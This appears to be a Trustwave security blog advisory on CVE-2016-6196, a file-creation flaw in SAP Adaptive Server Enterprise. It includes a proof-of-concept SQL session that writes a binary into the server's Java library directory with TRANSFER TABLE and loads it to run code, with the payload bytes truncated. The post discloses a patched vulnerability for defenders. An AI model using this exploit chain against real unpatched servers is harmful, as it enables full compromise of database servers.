SAP ASE file creation vulnerability (CVE-2016-6196)

Recently SAP released a patch for an Adaptive Server Enterprise vulnerability that allows legitimate database users to create files on disk where the server process can write to. This is useful when doing a chained database attack - first create a file which can be a binary (library), then trigger some function within the database server that will load this library and thus execute code in the server's process context (i.e. own the database server). Vulnerable versions of Adaptive Server Enterprise are 15.7 prior to SP137 and 16.0 prior to SP02 PL04.

Any table owner can run TRANSFER TABLE command. Note, however, that the guest user is explicitly prohibited from running the TRANSFER TABLE command. Here is a full proof-of-concept attack against Adaptive Server Enterprise 16.0 SP02 PL03 with Java enabled (don't enable Java if not required!):

1> create table t (val binary(10)) 
2> go
1> insert into t values (0x457f464c..)
2> go
(1 row affected)
1> transfer table t to '/opt/sap/shared/ase/SAPJRE-7_1_027_64BIT/lib/amd64/server/' for bcp
2> go
(1 row affected)
1> quit
1> declare @s java.lang.System
2> select @s = new java.lang.System("s")
3> go

The code requires that the user running it can create tables or owns some table to run the TRANSFER TABLE command. The INSERT populates table with binary data that is actually a malicious ELF file body. Next the binary is saved out to the server's file system using the vulnerable command and later loaded via Java.

It's worth noting that Trustwave reported this issue to SAP long time ago (CVE-2013-6864), it was patched but then surfaced again in recent releases of Adaptive Server Enterprise. As usual, Trustwave database security products contain a check verifying that necessary patches for this as well for other vulnerabilities are applied to your databases.

Please see the Trustwave advisory for more information about this vulnerability:

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.